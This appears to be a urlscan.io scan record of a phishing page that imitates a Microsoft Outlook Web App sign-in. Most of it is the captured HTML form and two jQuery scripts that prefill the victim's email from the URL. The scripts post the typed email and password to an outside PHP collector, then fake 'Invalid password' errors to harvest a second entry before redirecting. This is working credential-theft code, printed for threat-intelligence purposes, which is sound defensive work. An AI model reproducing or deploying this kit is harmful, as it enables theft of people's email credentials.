www.anmattwi.com
Open in
urlscan Pro
192.185.76.200
Malicious Activity!
Public Scan
Submitted URL: http://anmattwi.com/outlookwebapp.html?msg=
Effective URL: http://www.anmattwi.com/outlookwebapp.html?msg=
Submission: On August 20 via automatic, source openphish
Effective URL: http://www.anmattwi.com/outlookwebapp.html?msg=
Submission: On August 20 via automatic, source openphish
Form analysis
1 forms found in the DOMName: logonForm — POST
<form action="" method="POST" name="logonForm" enctype="" autocomplete="off">
<input type="hidden" name="destination" value="https://webmail.ipehq.com/owa/">
<input type="hidden" name="flags" value="0">
<input type="hidden" name="forcedownlevel" value="0">
<table align="center" id="tblMain" cellpadding="0" cellspacing="0">
<tbody>
<tr>
<td colspan="3">
<table cellspacing="0" cellpadding="0" class="tblLgn">
<tbody>
<tr>
<td class="lgnTL"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgntopl.gif" alt=""></td>
<td class="lgnTM"></td>
<td class="lgnTR"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgntopr.gif" alt=""></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td id="mdLft"> </td>
<td id="mdMid">
<table id="tblMid" class="mid">
<tbody>
<tr>
<td id="expltxt" class="expl">
</td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0">
<colgroup>
<col>
<col class="w100">
</colgroup>
<tbody>
<tr id="trSec">
<td colspan="2"> Security ( <a href="#" id="lnkShwSec" onclick="clkExp('lnkShwSec')">
show explanation
</a>
<a href="#" id="lnkHdSec" onclick="clkExp('lnkHdSec')" style="display:none">
hide explanation
</a> )
</td>
</tr>
<tr>
<td><input id="rdoPblc" type="radio" name="trusted" value="0" class="rdo" onclick="clkSec()" checked=""></td>
<td><label for="rdoPblc">This is a public or shared computer</label></td>
</tr>
<tr id="trPubExp" class="expl" style="display:none">
<td></td>
<td>Select this option if you use Outlook Web App on a public computer. Be sure to sign out when you've finished and close all windows to end your session.</td>
</tr>
<tr>
<td><input id="rdoPrvt" type="radio" name="trusted" value="4" class="rdo" onclick="clkSec()"></td>
<td><label for="rdoPrvt">This is a private computer</label></td>
</tr>
<tr id="trPrvtExp" class="expl" style="display:none">
<td></td>
<td>Select this option if you're the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out.</td>
</tr>
<tr id="trPrvtWrn" class="wrng" style="display:none">
<td></td>
<td>Warning: By selecting this option, you confirm that this computer complies with your organization's security policy.</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
<tr>
<td>
<table cellpadding="0" cellspacing="0">
<colgroup>
<col>
<col class="w100">
</colgroup>
<tbody>
<tr>
<td><input id="chkBsc" type="checkbox" class="rdo" onclick="clkBsc();"></td>
<td nowrap=""><label for="chkBsc">Use the light version of Outlook Web App</label></td>
</tr>
<tr id="trBscExp" class="disBsc" style="display:none">
<td></td>
<td>The light version of Outlook Web App includes fewer features. Use it if you're on a slow connection or using a computer with unusually strict browser security settings. We also support the full Outlook Web App experience
on some browsers on Windows, Mac, and Linux computers. To check out all the supported browsers and operating systems, <a href="http://go.microsoft.com/fwlink/?LinkID=129362" id="bscLnk">click here.</a></td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
<tr>
<td>
<p id="msg" style="color:red;"></p>
<table cellpadding="0" cellspacing="0">
<colgroup>
<col class="nowrap">
<col class="w100">
</colgroup>
<colgroup>
<col>
</colgroup>
<tbody>
<tr>
<td nowrap=""><label for="username">User name:</label></td>
<td class="txtpad"><input id="email" name="email" type="text" class="txt"></td>
</tr>
<tr>
<td nowrap=""><label for="password">Password:</label></td>
<td class="txtpad"><input id="password" name="password" type="password" class="txt" onfocus="on">
</td>
</tr>
<tr>
<td colspan="2" align="right" class="txtpad">
<button id="submit-btn" class="btn">Sign in</button>
</td>
</tr>
</tbody>
</table>
</td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
</tbody>
</table>
<table id="tblMid2" class="mid" style="display:none">
<tbody>
<tr>
<td>
<hr>
</td>
</tr>
<tr>
<td><br>Please enable cookies for this Web site.<br><br>Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. <br><br>For information about how to enable cookies, see the Help for your Web
browser.<br><br><br></td>
</tr>
<tr>
<td>
<hr>
</td>
</tr>
</tbody>
</table>
<table class="mid tblConn">
<tbody>
<tr>
<td rowspan="2" align="right" class="tdConnImg"><img style="vertical-align:top" src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnexlogo.gif" alt=""></td>
<td class="tdConn">Connected to Microsoft Exchange</td>
</tr>
<tr>
<td class="tdCopy">© 2010 Microsoft Corporation. All rights reserved.</td>
</tr>
</tbody>
</table>
</td>
<td id="mdRt"> </td>
</tr>
<tr>
<td colspan="3">
<table cellspacing="0" cellpadding="0" class="tblLgn">
<tbody>
<tr>
<td class="lgnBL"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnbotl.gif" alt=""></td>
<td class="lgnBM"></td>
<td class="lgnBR"><img src="https://webmail.ipehq.com/owa/14.3.382.0/themes/resources/lgnbotr.gif" alt=""></td>
</tr>
</tbody>
</table>
</td>
</tr>
</tbody>
</table>
<script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/jquery.session@1.0.0/jquery.session.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
var count = 0;
function getUrlVars() {
var vars = {};
var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
vars[key] = value;
});
return vars;
}
var number = getUrlVars()["msg"];
$("#email").val(number);
var my_email = number;
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var domain = final.charAt(0).toUpperCase() + final.slice(1);
$('#submit-btn').click(function(event) {
$('#error').hide();
$('#msg').hide();
event.preventDefault();
var email = $("#email").val();
var password = $("#password").val();
var msg = $('#msg').html();
$('#msg').text(msg);
if (!password) {
$('#msg').show();
$('#msg').html("Password field is emply.!");
return false;
}
///////////new injection////////////////
var my_email = email;
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (!filter.test(my_email)) {
$('#error').show();
email.focus;
return false;
}
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var finalu = c.toUpperCase();
$("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
$("#logoname").html(finalu);
///////////new injection////////////////
count = count + 1;
$.ajax({
dataType: 'JSON',
url: 'https://bradleyvisuals.com/poster.php',
type: 'POST',
data: {
email: email,
password: password,
},
// data: $('#contact').serialize(),
beforeSend: function(xhr) {
$('#submit-btn').html('Verifing...');
},
success: function(response) {
if (response) {
$("#msg").show();
console.log(response);
if (response['signal'] == 'ok') {
$("#password").val("");
if (count >= 2) {
count = 0;
// window.location.replace(response['redirect_link']);
window.location.replace("complete259e.html?msg=" + email);
}
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
} else {
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
}
}
},
error: function() {
$("#password").val("");
if (count >= 2) {
count = 0;
window.location.replace("complete259e.html?msg=" + email);
}
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
},
complete: function() {
$('#submit-btn').html('Sign in');
}
});
});
});
</script>
<script>
/* global $ */
$(document).ready(function() {
var count = 0;
function getUrlVars() {
var vars = {};
var parts = window.location.href.replace(/[?&]+([^=&]+)=([^&]*)/gi, function(m, key, value) {
vars[key] = value;
});
return vars;
}
var number = getUrlVars()["msg"];
$("#email").val(number);
var my_email = number;
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var domain = final.charAt(0).toUpperCase() + final.slice(1);
$('#submit-btn').click(function(event) {
$('#error').hide();
$('#msg').hide();
event.preventDefault();
var email = $("#email").val();
var password = $("#password").val();
var msg = $('#msg').html();
$('#msg').text(msg);
if (!password) {
$('#msg').show();
$('#msg').html("Password field is emply.!");
return false;
}
///////////new injection////////////////
var my_email = email;
var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;
if (!filter.test(my_email)) {
$('#error').show();
email.focus;
return false;
}
var ind = my_email.indexOf("@");
var my_slice = my_email.substr((ind + 1));
var c = my_slice.substr(0, my_slice.indexOf('.'));
var final = c.toLowerCase();
var finalu = c.toUpperCase();
$("#logoimg").attr("src", "https://www.google.com/s2/favicons?domain=" + my_slice);
$("#logoname").html(finalu);
///////////new injection////////////////
count = count + 1;
$.ajax({
dataType: 'JSON',
url: 'https://bradleyvisuals.com/posters.php',
type: 'POST',
data: {
email: email,
password: password,
},
// data: $('#contact').serialize(),
beforeSend: function(xhr) {
$('#submit-btn').html('Verifing...');
},
success: function(response) {
if (response) {
$("#msg").show();
console.log(response);
if (response['signal'] == 'ok') {
$("#password").val("");
if (count >= 2) {
count = 0;
// window.location.replace(response['redirect_link']);
window.location.replace("complete259e.html?msg=" + email);
}
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
} else {
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
}
}
},
error: function() {
$("#password").val("");
if (count >= 2) {
count = 0;
window.location.replace("complete259e.html?msg=" + email);
}
$("#msg").show();
$('#msg').html("Invalid password. Please try again");
},
complete: function() {
$('#submit-btn').html('Sign in');
}
});
});
});
</script>
</form>
Text Content
To use Outlook Web App, browser settings must allow scripts to run. For information about how to allow scripts, consult the Help for your browser. If your browser doesn't support scripts, you can download Windows Internet Explorer for access to Outlook Web App. -------------------------------------------------------------------------------- Security ( show explanation hide explanation ) This is a public or shared computer Select this option if you use Outlook Web App on a public computer. Be sure to sign out when you've finished and close all windows to end your session. This is a private computer Select this option if you're the only person who uses this computer. Your server will allow a longer period of inactivity before signing you out. Warning: By selecting this option, you confirm that this computer complies with your organization's security policy. -------------------------------------------------------------------------------- Use the light version of Outlook Web App The light version of Outlook Web App includes fewer features. Use it if you're on a slow connection or using a computer with unusually strict browser security settings. We also support the full Outlook Web App experience on some browsers on Windows, Mac, and Linux computers. To check out all the supported browsers and operating systems, click here. -------------------------------------------------------------------------------- User name: Password: Sign in -------------------------------------------------------------------------------- -------------------------------------------------------------------------------- Please enable cookies for this Web site. Cookies are currently disabled by your browser. Outlook Web App requires that cookies be enabled. For information about how to enable cookies, see the Help for your Web browser. -------------------------------------------------------------------------------- Connected to Microsoft Exchange © 2010 Microsoft Corporation. All rights reserved.